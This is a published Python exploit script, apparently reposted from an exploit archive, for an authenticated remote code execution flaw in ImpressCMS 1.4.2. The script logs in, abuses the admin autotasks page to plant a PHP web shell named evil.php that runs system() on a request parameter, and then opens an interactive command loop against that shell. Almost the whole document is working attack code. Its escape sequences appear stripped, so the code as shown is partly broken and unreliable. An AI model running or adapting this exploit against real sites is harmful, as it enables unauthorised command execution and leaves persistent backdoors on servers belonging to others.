Authored by Halit Akaydin

Impress CMS version 1.4.2 suffers from a remote code execution vulnerability.

# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows

# ImpressCMS is a multilingual content management system for the web
# Contains an endpoint that allows remote access
# Autotask page misconfigured, causing security vulnerability



# Example: python3 exploit.py -u http://example.com -l admin -p Admin123

import requests
import argparse
import sys
from time import sleep

session = requests.session()

def main():
  parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')
  parser.add_argument('-u', '--host', type=str, required=True)
  parser.add_argument('-l', '--login', type=str, required=True)
  parser.add_argument('-p', '--password', type=str, required=True)
  args = parser.parse_args()
  print("nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)",
      "nExploit Author: Halit AKAYDIN (hLtAkydn)n")
  exploit(args)

def countdown(time_sec):
    while time_sec:
        mins, secs = divmod(time_sec, 60)
        timeformat = '{:02d}'.format(secs)
        print("["+timeformat+"] The task is expected to run!", end='r')
        sleep(1)
        time_sec -= 1

def exploit(args):
  #Check http or https
  if args.host.startswith(('http://', 'https://')):
    print("[?] Check Url...n")
    args.host = args.host
    if args.host.endswith('/'):
      args.host = args.host[:-1]
    sleep(2)
  else:
    print("n[?] Check Adress...n")
    args.host = "http://" + args.host
    args.host = args.host
    if args.host.endswith('/'):
      args.host = args.host[:-1]
    sleep(2)

  try:
    response = requests.get(args.host)
    if response.status_code != 200:
      print("[-] Address not reachable!")
      sleep(2)
      exit(1)
  except requests.ConnectionError as exception:
    print("[-] Address not reachable")
    exit(1)


  response = requests.get(args.host + "/evil.php")
  if response.status_code == 200:
    print("[*] Exploit file exists!n")
    sleep(2)
    print("[+] Exploit Done!n")

    while True:
      cmd = input("$ ")
      url = args.host + "/evil.php?cmd=" + cmd
      headers = {
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
      }

      response = requests.post(url, headers=headers, timeout=5)

      if response.text == "":
        print(cmd + ": command not foundn")
      else:
        print(response.text)

  else:
    #Login and set cookie
    url = args.host + "/user.php"
    cookies = {
      "ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"
    }

    headers = {
      "Cache-Control": "max-age=0",
      "Upgrade-Insecure-Requests": "1",
      "Origin": args.host,
      "Content-Type": "application/x-www-form-urlencoded",
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
      "Referer": args.host,
      "Accept-Encoding": "gzip, deflate",
      "Accept-Language": "en-US,en;q=0.9",
      "Connection": "close"
    }

    data = {
      "uname": args.login,
      "pass": args.password,
      "xoops_redirect": "/",
      "op": "login"
    }

    response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
    new_cookies = session.cookies.get("ICMSSESSION")

    if (new_cookies is None):
      print("[-] Login Failed...n")
      print("Your username or password is incorrect.")
      sleep(2)
      exit(1)
    else:
      print("[+] Success Login...n")
      sleep(2)

      # Create Tasks
      url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"
      cookies = {
          "ICMSSESSION": new_cookies
      }

      headers = {
          "Cache-Control": "max-age=0",
          "Upgrade-Insecure-Requests": "1",
          "Origin": args.host,
          "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",
          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
          "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",
          "Accept-Encoding": "gzip, deflate",
          "Accept-Language": "en-US,en;q=0.9",
          "Connection": "close"
      }

      data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_id"rnrn0rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_lastruntime"rnrn0rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_name"rnrnrcern------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_code"rnrnfile_put_contents('../evil.php', "<?php system(x24_GET['cmd']); ?>");rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_repeat"rnrn0rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_interval"rnrn0001rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_onfinish"rnrn0rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_enabled"rnrn1rn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_type"rnrn:customrn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="sat_addon_id"rnrnrn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="icms_page_before_form"rnrn"+args.host+"/modules/system/admin.php?fct=autotasksrn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="op"rnrnaddautotasksrn------WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name="modify_button"rnrnSubmitrn------WebKitFormBoundaryZ2hA91yNO8FWPZmk--rn"
      response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

      if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":
        print("[*] Task Create.n")
        sleep(2)

        countdown(60)

        print("nn[+] Exploit Done!n")
        sleep(2)

        while True:
          cmd = input("$ ")
          url = args.host + "/evil.php?cmd=" + cmd
          headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
          }

          response = requests.post(url, headers=headers, timeout=5)
          if response.text == "":
            print(cmd + ": command not foundn")
          else:
            print(response.text)
      elif response.headers.get("location") == args.host + "/user.php":
        print("[!] Unauthorized user!nn")
        print("Requires user with create task permissions.")
        sleep(2)
      else:
        pass


if __name__ == '__main__':
  main()

RELATED ARTICLESMORE FROM AUTHOR